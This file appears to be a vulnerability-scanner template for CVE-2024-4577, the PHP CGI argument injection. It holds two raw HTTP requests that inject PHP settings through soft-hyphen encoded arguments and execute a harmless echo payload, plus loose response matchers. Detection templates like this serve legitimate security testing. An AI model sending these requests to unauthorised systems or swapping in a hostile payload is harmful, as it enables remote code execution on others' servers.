42 lines
1.2 KiB
YAML
42 lines
1.2 KiB
YAML
id: CVE-2024-4577
|
|
|
|
info:
|
|
name: PHP CGI Argument Injection Vulnerability
|
|
author: securityforeveryone
|
|
severity: high
|
|
description: |
|
|
CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.
|
|
reference:
|
|
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
|
|
- https://github.com/TAM-K592/CVE-2024-4577/tree/main
|
|
tags: rce,php,cgi,cve2024,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
<?php echo "vulnerable"; ?>
|
|
|
|
- |
|
|
POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
<?php echo "vulnerable"; ?>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "index of"
|
|
- "directory"
|
|
- "vulnerable"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|